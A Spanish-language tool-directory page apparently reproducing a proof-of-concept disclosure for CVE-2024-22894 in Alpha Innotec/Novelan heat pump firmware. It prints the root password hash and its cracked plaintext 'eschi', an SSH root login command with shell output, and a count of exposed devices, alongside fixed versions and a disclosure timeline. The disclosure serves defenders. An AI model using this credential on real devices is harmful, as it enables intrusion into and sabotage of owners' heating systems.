Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22894 — Exploit de prueba de concepto para CVE-2024-22894, que demuestra la extracción de la contraseña raíz cifrada con 3DES del firmware de bombas de calor Alpha Innotec/Novelan, permitiendo acceso SSH a dispositivos IoT vulnerables. | Kitploit
Herramientas/GitHubGitHub/jaarden/cve-2024-22894
Seguridad de Sistemas EmbebidosDescifrado de ContraseñasSeguridad IoTAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesCriptografíaSeguridad de Hardware e IoTAnálisis de Firmware
GitHubjaarden/cve-2024-22894

CVE-2024-22894

Exploit de prueba de concepto para CVE-2024-22894, que demuestra la extracción de la contraseña raíz cifrada con 3DES del firmware de bombas de calor Alpha Innotec/Novelan, permitiendo acceso SSH a dispositivos IoT vulnerables.

3113hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2024-22894

Descargué la última versión del firmware de la bomba de calor wp2reg-V3.88.0-9015 de https://www.heatpump24.com/DownloadArea.php. Dentro de este firmware hay un archivo llamado : wp2reg-V3.88.0-9015\wp2reg-AlphaInnotech-prod\home.wp2reg-V3.88.0-9015_221213\share\shadow

Esto contiene una contraseña cifrada con 3DES root:MEfgX2vrPJzuE:0:0:99999:7::: del usuario root del sistema y cuando se descifra/se crackea (en 5 segundos) muestra la contraseña eschi.

Al conectar mi bomba de calor a la red mediante un cable de red, puedes usar el usuario 'root' y la contraseña encontrada para iniciar sesión en el servicio SSH que está disponible.

> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes256-cbc root@$IP
$IP's password: eschi
# id
uid=0(root) gid=0 groups=0
# uname -a
Linux [...]  2.6.33.20 #3 PREEMPT Wed Oct 24 14:25:34 CEST 2018 armv5tejl GNU/Linux

Esta vulnerabilidad es aplicable a todas las bombas de calor Alpha Innotec y Novelan, que ejecutan el controlador Luxtronic. Está verificada y abordada por AIT Deutschland, el OEM de Alpha Innotec y Novelan, y la vulnerabilidad está presente en las siguientes versiones de firmware:

  • Versiones anteriores a V2.88.3
  • Versiones anteriores a V3.89.0
  • Versiones anteriores a V4.81.3

La bomba de calor debe conectarse a la red mediante una conexión LAN (RJ-45) para explotarla. Según Shodan, todavía hay 47 bombas de calor conectadas a Internet usando la misma versión y huella digital de SSH, que podrían verse comprometidas usando este exploit.

Una vez explotada, podría causar muchos daños, al cambiar ajustes o eliminar toda la configuración/software, causando que la bomba de calor funcione mal o se cuelgue. Por ejemplo, el directorio home contiene los siguientes archivos que podrían ser interesantes para un atacante:

# ls -alh /home
total 7448
drwxr-xr-x    5 root     0           4.8K Jan 12 08:59 .
drwxr-xr-x   14 root     0            992 Aug  1  2011 ..
drwxr-xr-x    3 root     0            224 Jan  1  1970 .update
-rw-rw-rw-    1 root     0          92.3K Jul 20  2022 10Min_1
-rw-rw-rw-    1 root     0          92.3K Sep 15  2022 10Min_2
-rwxrwxrwx    1 root     0          22.3K Jan 13  2021 ASB.bin
-rwxrwxrwx    1 root     0          23.3K Jul 15  2019 ASB_BL_Switch.bin
-rwxrwxrwx    1 root     0          22.1K Jul 15  2019 ASB_bootloader.bin
-rwxrwxrwx    1 root     0           1.2K Jun 16  2021 Defines.txt
-rwxrwxrwx    1 root     0          15.7K Jun 14  2021 HZIO.lin
-rw-rw-rw-    1 root     0            648 Jan  3 18:55 Info.dti
-rwxrwxrwx    1 root     0          15.3K Jul 24  2020 LD2AG.lin
-rwxrwxrwx    1 root     0          37.5K Jul 15  2019 LWD.lin
-rwxrwxrwx    1 root     0          26.8K Feb  8  2021 LWD45.lin
-rwxrwxrwx    1 root     0          38.8K Jul 15  2019 LWD90.lin
-rwxrwxrwx    1 root     0          37.9K Jul 15  2019 LWDRev.lin
-rwxrwxrwx    1 root     0          40.0K Jun 16  2021 LuxConst.sqlite
-rwxrwxrwx    1 root     0          26.9K Jul 24  2020 MSW_15.lin
-rwxrwxrwx    1 root     0          28.4K Jul 24  2020 MSW_Inverter.lin
-rw-rw-rw-    1 root     0         435.2K Jan 12 08:59 NewProc
-rw-rw-rw-    1 root     0           8.8K Jan  1 01:00 ParamArchive_1704067200
[...]
-rw-rw-rw-    1 root     0           8.8K Jan 12 01:00 ParamArchive_1705017600
-rwxrwxrwx    1 root     0          96.9K Jul 15  2019 SEC.bin
-rwxrwxrwx    1 root     0          31.6K Jul 15  2019 SWP.lin
-rwxrwxrwx    1 root     0          30.6K Jul 15  2019 SWPH.lin
-rwxrwxrwx    1 root     0          30.4K Jul 15  2019 SWPH291.lin
drwxrwxrwx    2 root     0            648 Apr 25  2023 Webserver
-rwxrwxrwx    1 root     0           5.0M Jun 16  2021 appl
-rwxrwxrwx    1 root     0            147 Jul 15  2019 appl.cfg
-rw-rw-rw-    1 root     0           8.8K Jan 12 08:59 appl_param1
-rw-rw-rw-    1 root     0           8.8K Jan 12 06:59 appl_param2
-rwxrwxrwx    1 root     0           9.4K Jul 15  2019 bootloader.lin
-rw-r--r--    1 root     0          20.0K Jan  1 05:10 default.sqlite
-rw-r--r--    1 root     0              0 Jan  1  1970 default.sqlite-wal
-rw-rw-r--    1 root     0             56 Sep 15  2022 errlog
-rw-r--r--    1 root     0          42.9K Apr  1  2011 firmware
-rwxrwxrwx    1 root     0            391 Jul 15  2019 index.html
-rwxrwxrwx    1 root     0          35.2K Jun 16  2021 lang_CR
[...
-rwxrwxrwx    1 root     0          37.8K Jun 16  2021 lang_tr
drwxr-xr-x    2 root     0            360 Jan  1  1970 share
-rwxrwxrwx    1 root     0             37 Jul 15  2019 timezone
-rwxrwxrwx    1 root     0           1.1K Jul 15  2019 udhcpc.script

Versiones corregidas

  • V2.88.3 o superior
  • V3.89.0 o superior
  • V4.81.3 o superior

Cronología

  • [13-06-2023] Divulgación responsable a: AIT-Deutschland (OEM), Alpha Innotec (Marca), Novelan (Marca), Nathan (Distribuidor neerlandés).
  • [19-06-2023] Respuesta de AIT-Deutschland para programar una reunión.
  • [22-06-2023] Reunión con AIT-Deutschland sobre la vulnerabilidad.
  • [01-07-2023 - 01-12-2023] AIT-Deutschland desarrolla una corrección para la vulnerabilidad.
  • [14-12-2023] Recopilación de información para los detalles del CVE.
  • [10-01-2024] Reunión con AIT-Deutschland sobre el envío de los detalles del CVE.
  • [26-01-2024] Asignado el ID de CVE CVE-2024-22894.
  • [30-01-2024] Publicado CVE-2024-22894.

Créditos

Los créditos van para AIT-Deutschland por tomarse este problema en serio y solucionarlo con prioridad.

Descargar herramienta